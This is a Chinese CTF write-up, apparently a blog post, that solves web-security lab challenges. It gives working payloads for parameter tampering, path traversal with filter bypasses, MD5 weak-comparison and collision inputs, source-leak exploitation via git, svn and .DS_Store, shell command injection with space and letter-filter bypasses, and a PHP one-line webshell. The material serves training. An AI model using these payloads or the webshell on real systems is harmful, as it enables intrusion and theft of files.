basicf12basic_1发现f12和鼠标有键被禁了在url地址的开头加view-source:这是加密过的flag需要解码basic_2进入后是一个“意见反馈”的功能我们随便输入一些内容提交时候抓包在发送的数据包中有个参数is_admin其参数值默认是0按这个提交后返回的是普通的“提交成功”我们把其参数值改为1发现返回了管理员相关的数据包得到flagbasic_3显示输入密码题目还提示“控制台”我们在靶场看看其js代码这个就是password但是是加密过的是js在控制台里发送就能解码basic_4这道题要分析其js代码它这里判断的依据就是_d(_0)返回的值我们可以在判断处打个断点然后在控制台里获取它返回的值然后我们可以直接控制台里inputQCCTF_VIP_2026然后继续运行靶场的jsbasic_5要求拿到1000积分分析其js代码currentScore就是当前积分我们打断点然后在控制台改参数值大于1000即可然后继续运行js点击页面中的”领取奖励“得到flagbasic_6bp抓包basic_7是一个拼图拼完后点击“提交”时抓包在repeater里send需要follow redirection一次ezrequest注意这里post请求的时候要加上这几个参数Content-Type: application/x-www-form-urlencoded Content-Length: 6 byydsezrequest_1最终的数据包“请使用指定代理 xujinyingcangming.top 访问。” 这个要用Via参数来指定basic_8进入靶场说“还没开发完成”根据提示应该是可以看到代码我们访问/index.php正常能访问那就/index.phps看到了源代码/?aQCyYdSbasic_9sitemap.xml站点地图 信息收集时先查看 /sitemap.xml 可发现“存在却未公开链接”的地址再结合 robots.txt、.phps 等途径进一步探测。直接用dirsearch扫描/robots.txt泄露一个/qcq.phpbasic_10用dirsearch扫描有/sitemap.xml访问/wqw.phpbasic_11/fl4g.phpbasic_12每点开一个文档都是会get传参?id对这个参数值爆破basic_13是一个登录功能用户名已知“admin”直接爆破basic_14在Linux中每打开一个文件内核都会分配一个文件描述符0--stdin标准输入fd 1 --stdout 标准输出2 --stderr 标准错误所以从3开始5的时候能拿到flag /proc/self/fd/5//这是本题的代码?phphighlight_file(__FILE__);$flagfopen(/admin_secret.txt,r);#这里已经打开了目标文件但是没有直接去读取内容#在Linux系统中当一个进程打开一个文件时内核会分配一个数字来标识这个文件这个数字就是“文件描述符”简称fd#Linux提供了一个特殊的目录/proc/self/fd/里面包含了当前进程所有打开的文件描述符的软链接。#/proc/self 代表当前进程自身if(isset($_GET[filename])strlen($_GET[filename])17){readfile($_GET[filename]);}else{echoThe filename parameter does not exist or the filename is too long;}?#在Linux系统中当一个进程打开一个文件时内核会分配一个数字来标识这个文件这个数字就是“文件描述符”简称fd #Linux提供了一个特殊的目录/proc/self/fd/里面包含了当前进程所有打开的文件描述符的软链接。 #/proc/self 代表当前进程自身/proc/self/fd/5ezphp?a0ab2222a绕过is_numeric() 在数值后面加一个字母ezphp_1?qc[a,QCCTF]ezphp_2?qc{n:[true],x:true}ezphp_3preg_match(/^Welcome to QingCen 2026!$/i,$_GET[qc])#模式分隔符/i 代表对大小写不敏感大小写都能被匹配到#preg_match()匹配到返回1否则返回0PHP 在解析参数名时一旦遇到 [就会把它当成数组语法的开始这样后面的 . 就不会再被转换掉。get传参?qcwelcome to QingCen 2026!lover2024post传参QaCaZJZ[QingCen.2026Happy to see you!ezmd5php中 属于弱比较 如果两个字符串都是数字字符串或科学计数法格式会转换为数字比较 某些字符串的MD5值以0e开头后面全是数字。在科学计数法中他们都等于0常见0e开头的MD5字符串 QNKCDZO---0e830400451993494058024219903391 240610708---0e462097431906509019562988736854 aabg7XSs---0e087386482136013740957780965295 s155964671a---0e342768416822451524974117254469本题?QCQNKCDZOezmd5_1弱比较?a[]1b[]2ezmd5_2?a[]1b[]2ezmd5_3a[]1b[]2ezmd5_4先用字典跑一下哪个的md5加密后的值有目标字符串importhashlibforiinrange(1,100000000000):print(i)if(hashlib.md5(str(i).encode()).hexdigest()[-6:]d54e23):print(----------------,i)break?QC26120ezmd5_5?a[]1b[]2ezmd5_6?a[]1b[]2ezmd5_7a%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2 b%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2 这两个参数的MD5值相同积累?a%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2b%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2提交时候注意不要被url编码建议直接在url中传参ezinfoleak进入后是一一个“日志中心”打开第一个“系统异常日志”看打印出来的第一行有个secret_file_b64Zmw0Zy50eHQ提示了文件fl4g.txt在Path里输入../../../fl4g.txtezinfoleak_1本题过滤了../双写绕过....//....//....//fl4g.txtezinfoleak_2/flag.txt.bak下载备份文件ezinfoleak_3用dirsearch扫描扫到phpinfo.php/phpinfo.phpezinfoleak_4用dirsearch扫描git泄露打开githacker工具所在的目录githacker --url http://docker.qingcen.net:42667/ezinfoleak_5同上git泄露?phpif($_SERVER[REQUEST_METHOD]POST){$token$_POST[token]??;if($tokenget_flag){$flaggetenv(FLAG)?:;echo$flag;}}?ezinfoleak_6git泄露一进来没有发现用git log --all查看历史记录恢复git show 编码ezinfoleak_7进来是一个“内部管理系统”的登录页面dirsearch 扫描出.svn文件泄露用svnrip工具ezinfoleak_8dirsearch扫描.hg文件泄露ezinfoleak_9提示信息泄露因vim编辑器而导致泄露的文件用.文件名.类型.swp 读取/.flag.txt.swpezinfoleak_10/.flag.txt.swpflag文件会自动下载下来这是因为被vim备份了ezinfoleak_11提示“macOS Finder再通过dirsearch扫描有/.DS_Store文件泄露/.DS_Store直接能访问到ezinfoleak_12用dirsearch扫描、.DS_Store文件泄露使用ds_store_exp脚本经过尝试目录应该是/.archive/sync_part_所以按这种来全都尝试访问每个的返回结果不一样H4sIAAAAAAAAA0vLSU yvtjQ2sjBINjTXNTRJ StU1MUw11rVMtQASyS YWKRapKYlJpoa1ALn LDQqAAAA把它们拼接base64解码后再Gunzipezcmdezcmd_1使用管道符|ezcmd_2在指令后面接一个||ezcmd_3这道题与上一题类似但是过滤了空格用${IFS}绕过cmdls${IFS}../../../||cmdcat${IFS}../../../flag||ezcmd_4用dirsearch扫描有robots.txt文件泄露/robots.txt里面有“4atP5Aup.php”访问/4atP5Aup.phpcmdeval afl;bag;rev /$a$beval() Bash的内置命令。作用是接收后面的参数把它们组合成一个字符串然后再把这个字符串当作真正的Shell命令执行一次 afl;bag; 变量赋值。绕过拦截(这里的flag需要逆过来)flag{52045c69-05ba-47d6-9a29-723bf528e21c}ezcmd_5题目过滤了大小写字母考虑使用通配符在Linux Shell中?是一个通配符代表任意一个单一字符。它可以帮助我们“盲猜”文件或命令的名称从而避免在 payload 中写出完整的字母。按照这种想法肯定能想到把/flag.txt转化成/????.???flag是存在txt文件里需要用读取文件的指令来读取而现在是在linux环境里常用的指令都会存放在/bin/目录下此目录里又有很多相关命令如果你想用cat命令你就会写成??? /????.???但是三个字符的命令又有很多就是匹配到了多个结果会直接导致错误所以我们需要一个特殊的单一的能读取文件的方式来读取base64 [选项] [文件] 在Linux中用于base64编码与解码的命令行工具常用于仅支持文本传输的场景 常用选项 -d 解码 -i 解码时忽略非base64字符 该指令位于/bin/base64所以最终指令就是/bin/base64 /flag.txt然后字母用 来替换/???/????64 /????.???解码即可ezcmd_6常见的php一句话木马 ?php eval($_POST[qc])?可以直接用蚁剑去连接就能读取到网站目录了ezcmd_7eval() php中把字符串当成php代码来运行 eval(phpcode) php中能执行系统外部命令的函数 exec() passthru() system() shell_exec()?qcsystem(ls ../../../);因为代码中提示对flag会匹配而且大小写敏感?qcsystem(cat ../../../????);ezcmd_8?qcpassthru(ls ../../../);发现flag?qcpassthru(cat ../../../????);ezcmd_9空格绕过 %09 \${IFS} $IFS\$9 \ \ {,}?qcpassthru(ls%09../../../);?qcpassthru(cat%09../../../flag);或者?qcreadfile(../../../flag);ezcmd_10这里把分号;给过滤了我们知道eval()函数是用来把参数当作php代码来执行的而php代码的每条语句必须以;结尾除了最后一条或闭合标签前?qcsystem(ls)?成功执行
企业数字化 ERP 产品动态
相关推荐
Atlas 300V 24G部署YOLO实战:从环境配置到模型推理优化 1. Atlas 300V 24G:先搞清楚它算不算是“运算加速卡”最近在团队里接了一台新设备,原话就只有一句:“给它装上Atlas,跑YOLO。”我第一反应是:哪个Atlas?等把设备拿到手,翻过标签确认是Atlas 300… · 2026/9/25 18:44:14
Labelme语义分割标注与json转Ground Truth掩码完整实践 做视觉项目最绕不开的一环就是数据标注。我最早做语义分割任务时,拿着一批jpg图片手动描边,画完还得想尽办法把标注结果转成模型能读的Ground Truth,中间踩过不少坑。Labelme是老牌标注工具,打开即用、离线运行、支持多边形级标注… · 2026/9/25 18:44:14
Raven Agent Loop全解:Turn、Iteration、子代理与检查点回滚如何协同工作 Raven Agent Loop全解:Turn、Iteration、子代理与检查点回滚如何协同工作 【免费下载链接】Raven The Harness of Harnesses: a trusted, persistent, self-evolving multi-agent ecosystem for all-domain collaboration. 项目地址: https://gitcode.com/gh_mirr… · 2026/9/25 19:10:28
小白程序员轻松入门AI Agent开发工程师之路 随着大语言模型(LLM)的发展,企业需要的是能可靠完成真实业务任务的AI Agent软件系统,催生了"AI Agent开发工程师"这一新岗位。文章拆解了该岗位所需的8大核心能力域,包括后端工程基础、Python工程能力、LLM API与Prompt、Agent Loop与Tool Use、RAG与知识库、Context… · 2026/9/25 19:10:28
点云预处理与特征计算:任务导向的工业级实践指南 1. 为什么点云预处理不是“清洗一下就完事”的体力活点云数据预处理和特征计算,这两个词在测绘、自动驾驶、工业检测、数字孪生这些领域里天天被提起,但绝大多数人一上手就栽在第一步——误以为它只是“把噪点删掉、把空洞补上、再导出个ply文件”这种标… · 2026/9/25 19:10:04
基于昇腾Atlas 300V 24G推理卡的YOLO模型部署与调优实践 前阵子团队准备把一套基于YOLOv5的检测服务从GPU服务器迁移到昇腾Atlas上,群里讨论最多的一句话就是:“atlas 300v 24g是运算加速卡吗?”我当时也愣了一下。后来翻完产品文档、踩了一周坑,才算把这卡的脾气摸清楚。如果你也是第一… · 2026/9/25 19:09:58
DEAP脑电情绪二分类实战:从EDF加载到XGBoost建模 简介:本资源是一套基于DEAP脑电数据集的轻量级脑电情绪二分类实践方案,面向人工智能初学者、生物医学工程入门者及机器学习爱好者,聚焦情绪识别这一典型小样本分类任务。项目完整覆盖信号处理(FFT频域转换)、特征预处理… · 2026/9/25 19:09:58
创维E900V22D刷机全攻略:S905L3SB芯片兼容性解析与救砖实战 /* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views … · 2026/9/25 1:00:31
MQTT协议原理与Broker服务器搭建实战:从Mosquitto到EMQX /* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views … · 2026/9/25 1:00:37